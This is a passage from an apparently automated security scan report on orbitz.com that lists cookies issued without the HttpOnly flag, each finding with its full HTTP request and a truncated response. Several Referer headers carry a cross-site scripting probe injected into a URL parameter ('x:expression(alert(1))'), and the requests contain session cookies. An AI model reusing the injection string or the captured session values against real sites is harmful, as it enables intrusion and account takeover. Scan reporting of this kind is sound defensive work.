<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<rss version="2.0">
<channel>
<title>Airfares by Departure City</title>
<link>http://www.orbitz.com/App/PrepareFlights?gtkw=
...[SNIP]...

12.696. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/pagedef/content/legal/bestPriceGuarantee.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=20BF51DAC8FDA4EE977AD70538F94CA9; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pagedef/content/legal/bestPriceGuarantee.jsp?popupsDisabled=false HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.697. http://www.orbitz.com/public/ANS/Orbitz/html/PackageSave30_012411.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/public/ANS/Orbitz/html/PackageSave30_012411.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/ANS/Orbitz/html/PackageSave30_012411.xml HTTP/1.1
Accept: */*
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x:expression(alert(1))%221333ba1041f
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.orbitz.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: BetaGroup="01/27/2011 19:52:47|A|A|N|C|N|H|B|P|N"; WT_FPC=id=173.193.214.243-504835424.30129806:lv=1296573817240:ss=1296573817240; anon=15636604731296573771992; OrbitzRegistration="N,0,0,0"; logging=4D84CD377DBEA23C09465CAB80CFF42F|egapp06p|; OSC=4D84CD377DBEA23C09465CAB80CFF42F; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73545525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 28 Jan 2011 15:30:50 GMT
ETag: "30676-49ae9c03b1e80"
Content-Type: text/xml
ntCoent-Length: 198262
Server: Apache
Date: Tue, 01 Feb 2011 15:29:05 GMT
Age: 5835
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 198262

<?xml version="1.0" encoding="utf-8" standalone="no"?>

<channel>
<title />
<link />
<description />
<language />
<copyright />
<pubDate />
<lastBuildD
...[SNIP]...

12.698. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/adserverProxy.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=E894D0E87D40EFBE1B808EFE6EAA0B1A; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true

Response

12.699. http://www.orbitz.com/shared/css/DPTLiteDetails.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/DPTLiteDetails.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=5427BB66204CA10EC64835F2C5365664; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/DPTLiteDetails.css.jsp?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=5427BB66204CA10EC64835F2C5365664; Path=/
Content-Type: text/css;charset=UTF-8
Date: Wed, 02 Feb 2011 16:05:06 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 42171

body {margin-left:20px;}
#body {width:960px; border: 2px solid #eee;border-width:0 2px;padding-top:16px;background: transparent url(/site/img/chrome/bg/bgBodyDPT.gif) repeat-y scroll right center;}
...[SNIP]...

12.700. http://www.orbitz.com/shared/css/calendar.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/calendar.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=C13590BF3B17076E6B8C0D223539F0EF; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/calendar.css.jsp?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/ViewDHTMLCalendar?z=2ec5&r=o
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=C13590BF3B17076E6B8C0D223539F0EF; Path=/
Content-Type: text/css;charset=UTF-8
ntCoent-Length: 1971
Date: Wed, 02 Feb 2011 16:05:05 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 1971

#calendarBody {background-color:#039; margin:0;}
#calendarBody.hidden {background-color:#adf;}
#calendar table {background-color:#fff;border:2px solid #36f; width:140px;}
#calendar .arrowNext {floa
...[SNIP]...

12.701. http://www.orbitz.com/shared/css/dealsOrbot.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/dealsOrbot.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=0E191AA8B9E8F1D1C3DBC4680E08C776; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/dealsOrbot.css.jsp?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=0E191AA8B9E8F1D1C3DBC4680E08C776; Path=/
Content-Type: text/css;charset=UTF-8
Date: Wed, 02 Feb 2011 16:05:29 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 8674

#BotBox .botBox corporate {margin:0; padding:0;}
.botBox {width:100%; margin:0; padding:0 }

.botTop {border:none; height: 30px; background: #adf url(/site/img/chrome/searchBots/topLeftDeals.gif
...[SNIP]...

12.702. http://www.orbitz.com/shared/css/dialog.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/dialog.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=F535112F8ACB21D4AF8174B2A12F522E; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/dialog.css.jsp?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=F535112F8ACB21D4AF8174B2A12F522E; Path=/
Content-Type: text/css;charset=UTF-8
Date: Wed, 02 Feb 2011 16:05:07 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 16702

/* Layout for the dialog object
NOTE: these are shared by microcontent and lightbox, so be mindful when editing
*/

       .dialogWrapper { /*do not change these properties*/
           display:block;
           lef
...[SNIP]...

12.703. http://www.orbitz.com/shared/css/global.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/global.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=E3EC351BEEEC173D10941AF249967D01; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/global.css.jsp?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=E3EC351BEEEC173D10941AF249967D01; Path=/
Content-Type: text/css;charset=UTF-8
Date: Wed, 02 Feb 2011 16:05:04 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 74405

* {
margin: 0;
}

body {padding: 0; margin: 0; background: #fff;background-image: url('/d.gif'); background-attachment: fixed;}
body, td, th, div, p, input, select, label, legend, h1, h2, h3, h4,
...[SNIP]...

12.704. http://www.orbitz.com/shared/css/homepage.css.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/css/homepage.css.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=DFE863697E7B51E1708B5023855C32E9; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shared/css/homepage.css.jsp HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296342267897:ss=1296342267897; OSC=265DA875C314B0C54855FC80AB1B1D8C; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=DFE863697E7B51E1708B5023855C32E9; Path=/
Content-Type: text/css;charset=UTF-8
Date: Wed, 02 Feb 2011 16:04:53 GMT
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 138024

* {
margin: 0;
}

body {padding: 0; margin: 0; background: #fff;background-image: url('/d.gif'); background-attachment: fixed;}
body, td, th, div, p, input, select, label, legend, h1, h2, h3,
...[SNIP]...

12.705. http://www.orbitz.com/shared/js/behaviors.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/behaviors.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/behaviors.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "40c7-49ad5c2473240"
Content-Type: application/x-javascript
Cteonnt-Length: 16583
Server: Apache
Date: Wed, 02 Feb 2011 16:04:40 GMT
Age: 11333
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 16583

function changeImage(id,img) {
   var oImg = document.getElementById(id);
   if (oImg) {
       oImg.src = img;
   }
}

function changeStyle(id,styleSelector,value){
   eval("document.getElementById(id).style."+st
...[SNIP]...

12.706. http://www.orbitz.com/shared/js/bot.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/bot.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/bot.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=8916556551294354144817; OrbitzRegistration="N,0,0,0"; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; PackagingContext=APH; DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; OSC=265DA875C314B0C54855FC80AB1B1D8C; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573790782:ss=1296573790782; mbox=check#true#1296573851|session#1296573790873-999455#1296575651; adRotator=true; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 27 Jan 2011 15:39:45 GMT
ETag: "288f7-49ad5c2473240"
Content-Type: application/x-javascript
ntCoent-Length: 166135
Server: Apache
Date: Wed, 02 Feb 2011 16:04:45 GMT
Age: 11007
Connection: keep-alive
Cache-Control: private
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 166135

/*
A Bot is a search form.
   A product is a travel vertical which may or may not have a bot on a page.
*/

var botMgr = new function () {
   this.initialized = false;
   this.botBoxIds = new Array
...[SNIP]...

12.707. http://www.orbitz.com/shared/js/cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/shared/js/cookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/js/cookie.js?cache=20041122 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
